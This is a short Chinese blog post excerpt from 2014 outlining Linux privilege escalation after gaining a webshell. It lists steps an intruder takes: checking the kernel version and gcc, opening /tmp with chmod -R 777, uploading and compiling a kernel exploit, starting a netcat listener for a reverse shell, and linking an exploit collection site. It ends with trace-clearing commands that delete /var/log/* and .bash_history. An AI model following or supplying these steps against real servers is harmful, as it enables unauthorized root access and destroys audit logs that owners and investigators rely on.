linux提权基本思路整理
摘要:
拿到linux服务器的webshell后,先看有没有执行命令的权限uname -a查看linux的内核版本gcc --help试探服务器是否可以进行gcc编译(有些exp没有编译)访问/tmp目录,看是否有所有权限如果没有,则通过 chmod -R 777 开启上传对应内核版本的exp到/tmp目录,然后执行./exp名没编译的则运行gcc -o /tmp/文件名 /tmp/文件名.cnc反弹nc -l -n -v -p 12666附个常用exp收集地址:http://exp.0x80c.com/痕迹清理:rm -f -r /var/log/*rm .bash_historyrm recent 阅读全文
posted @ 2014-03-15 10:54 无名组 阅读(279) 评论(0) 推荐(0) 编辑